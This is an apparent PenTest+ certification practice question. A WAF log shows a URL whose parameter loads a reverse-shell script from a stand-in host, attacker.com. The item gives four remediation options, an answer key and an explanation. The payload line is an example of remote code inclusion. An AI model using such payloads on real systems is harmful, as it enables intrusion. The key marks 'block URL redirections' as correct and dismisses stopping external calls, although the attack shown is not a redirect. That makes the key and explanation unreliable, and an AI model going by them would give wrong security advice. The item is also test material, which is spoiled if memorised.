CompTIA PenTest+ (PT0-001) — Question 5

While monitoring WAF logs, a security analyst discovers a successful attack against the following URL: https://example.com/index.php?Phone=http://attacker.com/badstuffhappens/revshell.php
Which of the following remediation steps should be taken to prevent this type of attack?

Answer options

• A. Implement a blacklist.
• B. Block URL redirections.
• C. Double URL encode the parameters.
• D. Stop external calls from the application.

Correct answer: B

Explanation

The correct answer is B, as blocking URL redirections helps to mitigate risks from external sites that may host malicious content. Options A and C may not be effective against all types of attacks, and D could overly restrict the application's functionality, impacting legitimate use cases.